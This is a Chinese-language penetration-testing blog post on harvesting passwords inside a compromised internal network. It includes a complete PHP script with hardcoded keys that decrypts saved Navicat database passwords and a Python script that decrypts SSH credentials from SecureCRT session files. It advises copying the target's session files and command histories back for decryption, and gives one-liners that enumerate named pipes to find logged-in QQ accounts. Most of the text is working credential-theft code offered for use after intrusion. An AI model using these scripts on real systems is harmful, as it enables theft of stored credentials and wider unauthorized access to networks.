内网渗透-内网密码信息搜集

0X01 内网密码搜集-Navicat连接密码解密

  • NAvicat Permium 12为例

  • 步骤一:选择文件—->导出连接,勾选想要导出的数据库,导出.ncx后缀的文件


  • 步骤二:复制加密的password,运行如下php脚本。本地没有安装PHP,使用在线运行的工具https://tool.lu/coderunner/

  • 赋PHP脚本

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    <?php
    namespace FatSmallTools;
    class NavicatPassword
    {
    protected $version = 0;
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;

    public function __construct($version = 12)
    {
    $this->version = $version;
    $this->blowKey = sha1('3DC5CA39', true);
    $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }

    public function encrypt($string)
    {
    $result = FALSE;
    switch ($this->version) {
    case 11:
    $result = $this->encryptEleven($string);
    break;
    case 12:
    $result = $this->encryptTwelve($string);
    break;
    default:
    break;
    }

    return $result;
    }

    protected function encryptEleven($string)
    {
    $round = intval(floor(strlen($string) / 8));
    $leftLength = strlen($string) % 8;
    $result = '';
    $currentVector = $this->blowIv;

    for ($i = 0; $i < $round; $i++) {
    $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
    $currentVector = $this->xorBytes($currentVector, $temp);
    $result .= $temp;
    }

    if ($leftLength) {
    $currentVector = $this->encryptBlock($currentVector);
    $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
    }

    return strtoupper(bin2hex($result));
    }

    protected function encryptBlock($block)
    {
    return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    protected function decryptBlock($block)
    {
    return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    protected function xorBytes($str1, $str2)
    {
    $result = '';
    for ($i = 0; $i < strlen($str1); $i++) {
    $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
    }

    return $result;
    }

    protected function encryptTwelve($string)
    {
    $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    return strtoupper(bin2hex($result));
    }

    public function decrypt($string)
    {
    $result = FALSE;
    switch ($this->version) {
    case 11:
    $result = $this->decryptEleven($string);
    break;
    case 12:
    $result = $this->decryptTwelve($string);
    break;
    default:
    break;
    }

    return $result;
    }

    protected function decryptEleven($upperString)
    {
    $string = hex2bin(strtolower($upperString));

    $round = intval(floor(strlen($string) / 8));
    $leftLength = strlen($string) % 8;
    $result = '';
    $currentVector = $this->blowIv;

    for ($i = 0; $i < $round; $i++) {
    $encryptedBlock = substr($string, 8 * $i, 8);
    $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
    $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
    $result .= $temp;
    }

    if ($leftLength) {
    $currentVector = $this->encryptBlock($currentVector);
    $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
    }

    return $result;
    }

    protected function decryptTwelve($upperString)
    {
    $string = hex2bin(strtolower($upperString));
    return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
    }
    use FatSmallTools\NavicatPassword;

    //需要指定版本,11或12
    $navicatPassword = new NavicatPassword(12);
    //$navicatPassword = new NavicatPassword(11);

    //解密
    //$decode = $navicatPassword->decrypt('15057D7BA390');
    $decode = “密码:”.$navicatPassword->decrypt('83D95C24B42567332F09503BF701A252');
    echo $decode."\n";

0X02 内网密码搜集-MobaXterm终端神器

  • 看图操作

0X03 Win SSH 及 SFTP 客户端密码 hash 解密 SecureCRT < 7.1

###0x03.1 找到 SecureCRT 配置文件目录下的 Sessions 目录

  • 直接把目标 SecureCRT config 目录下所对应的 session 文件想办法拖回来进行本地解密即可。
    -w1183

  • SecureCRT 的每个 session 文件都会用连接的 ip 或者域名的形式来命名。

  • 解密脚本是基于 python2.7 的,解密也需要用到 pycrypto 库,这些基础环境都已提前准备好,还是那句话,此处的解密脚本只支持 7.x 系列解密,依赖库pycrypto

  • py解密脚本:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    #!/usr/bin/env python
    #

    # Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files
    # Can be found on Windows in:
    # %APPDATA%\VanDyke\Config\Sessions\sessionname.ini
    # Tested with version 7.2.6 (build 606) for Windows
    # Eloi Vanderbeken - Synacktiv
    # Decrypt SSHv2 passwords stored in VanDyke SecureCRT

    # C:\>python SecureCRT-decryptpass.py -h
    # usage: SecureCRT-decryptpass.py [-h] files [files ...]
    #
    #Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files
    #
    #positional arguments:
    # files session file(s)
    #
    #optional arguments:
    # -h, --help show this help message and exit
    #
    # C:\>python SecureCRT-decryptpass.py C:\Users\user1\AppData\Roaming\VanDyke\Config\Sessions\192.168.0.1.ini
    # C:\Users\user1\AppData\Roaming\VanDyke\Config\Sessions\192.168.0.1.ini
    # ssh -p 22 user@192.168.0.1 # 123456


    from Crypto.Cipher import Blowfish
    import argparse
    import re

    def decrypt(password) :
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    p = ''
    while padded[:2] != '\x00\x00' :
    p += padded[:2]
    padded = padded[2:]
    return p.decode('UTF-16')

    REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
    REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
    REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
    REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

    def hostname(x) :
    m = REGEX_HOSTNAME.search(x)
    if m :
    return m.group(1)
    return '???'

    def password(x) :
    m = REGEX_PASWORD.search(x)
    if m :
    return decrypt(m.group(1))
    return '???'

    def port(x) :
    m = REGEX_PORT.search(x)
    if m :
    return '-p %d '%(int(m.group(1), 16))
    return ''

    def username(x) :
    m = REGEX_USERNAME.search(x)
    if m :
    return m.group(1) + '@'
    return ''

    parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
    parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
    help='session file(s)')

    args = parser.parse_args()

    for f in args.files :
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), password(c))
  • 除了 ssh 连接账号密码,如果本地还保存的有目标运维平时的命令历史记录,同样也值得关注,里面很可能还会存的有其它的各种账号密码,同样有用
    -w587

0X04 内网信息搜集-浅谈windows管道

  • 一句话获取电脑已经登录的QQ

    1
    powershell : [System.Text.RegularExpressions.Regex]::Matches([System.IO.Directory]::GetFiles("\\.\\pipe\\"),"QQ_(\d*)_pipe").Groups;
1
cmd : dir \\.\pipe\\ | findstr "QQ_" | findstr "_pipe"